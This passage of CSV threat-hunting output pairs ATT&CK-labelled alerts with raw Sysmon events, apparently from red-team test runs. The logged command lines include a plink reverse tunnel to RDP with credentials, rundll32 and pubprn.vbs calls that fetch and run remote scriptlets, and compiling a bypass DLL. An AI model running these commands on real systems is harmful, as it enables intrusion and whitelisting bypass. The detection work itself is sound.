(32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1550311342.965921,2019-02-16T14:02:22.965921+04:00,,Threat,High,User Name : ( PC01\IEUser ) with Command Line : ( plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test ) contain suspicious command ( plink.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1940899 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-02-16 10:02:21.934 + 365ABB72-DFAD-5C67-0000-0010E0811500 + 2312 + C:\Users\IEUser\Desktop\plink.exe + Release 0.70 + Command-line SSH, Telnet, and Rlogin client + PuTTY suite + Simon Tatham + plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test + C:\Users\IEUser\Desktop\ + PC01\IEUser + 365ABB72-D6AB-5C67-0000-002056660200 + 0x26656 + 1 + High + SHA1=7806AD24F669CD8BB9EBE16F87E90173047F8EE4 + 365ABB72-D92A-5C67-0000-0010CB580900 + 3904 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application 
Whitelisting,1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"))",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4971 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:10.619 + 747F3D96-6652-5D3F-0000-001058828C00 + 348 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-6652-5D3F-0000-0010B9708C00 + 5844 + C:\Windows\System32\cmd.exe + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") )",1," + + + + + 1 + 5 + 4 + 1 + 0 
+ 0x8000000000000000 + + + 4971 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:10.619 + 747F3D96-6652-5D3F-0000-001058828C00 + 348 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-6652-5D3F-0000-0010B9708C00 + 5844 + C:\Windows\System32\cmd.exe + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4971 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:10.619 + 747F3D96-6652-5D3F-0000-001058828C00 + 348 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication 
";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-6652-5D3F-0000-0010B9708C00 + 5844 + C:\Windows\System32\cmd.exe + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436050.388196,2019-07-30T01:34:10.388196+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4969 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:10.292 + 747F3D96-6652-5D3F-0000-0010B9708C00 + 5844 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 
747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( rundll32 AllTheThings.dll,EntryPoint)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4968 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.526 + 747F3D96-664D-5D3F-0000-0010BB5D8C00 + 5572 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-664D-5D3F-0000-00108D5B8C00 + 912 + C:\Windows\System32\rundll32.exe + rundll32 AllTheThings.dll,EntryPoint + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4968 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.526 + 747F3D96-664D-5D3F-0000-0010BB5D8C00 + 5572 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + 
Microsoft Corporation + rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-664D-5D3F-0000-00108D5B8C00 + 912 + C:\Windows\System32\rundll32.exe + rundll32 AllTheThings.dll,EntryPoint + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4968 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.526 + 747F3D96-664D-5D3F-0000-0010BB5D8C00 + 5572 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-664D-5D3F-0000-00108D5B8C00 + 912 + C:\Windows\System32\rundll32.exe + rundll32 AllTheThings.dll,EntryPoint + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 AllTheThings.dll,EntryPoint)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4967 + 
+ + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.475 + 747F3D96-664D-5D3F-0000-00108D5B8C00 + 912 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-664D-5D3F-0000-0010F1498C00 + 6836 + C:\Windows\System32\cmd.exe + cmd /c rundll32 AllTheThings.dll,EntryPoint + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028767.134377,2019-03-20T00:52:47.134377+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966449 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:52:47.054 + 365ABB72-569F-5C91-0000-001012610800 + 2548 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +"[T1117] 
Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4967 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.475 + 747F3D96-664D-5D3F-0000-00108D5B8C00 + 912 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-664D-5D3F-0000-0010F1498C00 + 6836 + C:\Windows\System32\cmd.exe + cmd /c rundll32 AllTheThings.dll,EntryPoint + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4967 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.475 + 747F3D96-664D-5D3F-0000-00108D5B8C00 + 912 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + 
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-664D-5D3F-0000-0010F1498C00 + 6836 + C:\Windows\System32\cmd.exe + cmd /c rundll32 AllTheThings.dll,EntryPoint + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028746.364512,2019-03-20T00:52:26.364512+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966444 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:52:26.194 + 365ABB72-568A-5C91-0000-0010D24B0800 + 4072 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1564436085.660037,2019-07-30T01:34:45.660037+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c cscript /b 
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5006 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:45.524 + 747F3D96-6675-5D3F-0000-0010875C8F00 + 4036 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 747F3D96-6675-5D3F-0000-0010AA498F00 + 4184 + C:\Windows\System32\cmd.exe + cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547556.069498,2019-07-19T18:45:56.069498+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "del T1121.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3615 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:56.002 + 747F3D96-D7A4-5D31-0000-0010C9C22900 + 6804 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c 
"del T1121.dll" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547555.699293,2019-07-19T18:45:55.699293+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3613 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:55.672 + 747F3D96-D7A3-5D31-0000-001081B22900 + 5800 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028745.943907,2019-03-20T00:52:25.943907+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966429 + + + + + 
Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:52:25.853 + 365ABB72-5689-5C91-0000-0010543F0800 + 3896 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1563547555.621447,2019-07-19T18:45:55.621447+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs ) contain suspicious command ( \csc.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3611 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:55.057 + 747F3D96-D7A3-5D31-0000-0010F2A42900 + 4784 + C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe + 4.7.3190.0 built by: NET472REL1LAST_C + Visual C# Command Line Compiler + Microsoft® .NET Framework + Microsoft Corporation + C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=ABAF24113034BBA4B4F4AC19D9097D36943D2E35,MD5=B87EE552626023951A7F03F2D31DA8A7,SHA256=D511363874B2A00D3DA5A20E6AE826334795A3A52AB5F8555C309D8068F5915B,IMPHASH=C4963CB3AF58DCFC863E42DD3B6FB80D + 747F3D96-D7A3-5D31-0000-0010A0A22900 + 6748 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1563547555.105804,2019-07-19T18:45:55.105804+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" ) contain suspicious command ( \csc.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3610 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:55.023 + 747F3D96-D7A3-5D31-0000-0010A0A22900 + 6748 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line 
Interface,1563547555.105804,2019-07-19T18:45:55.105804+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3610 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:55.023 + 747F3D96-D7A3-5D31-0000-0010A0A22900 + 6748 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + 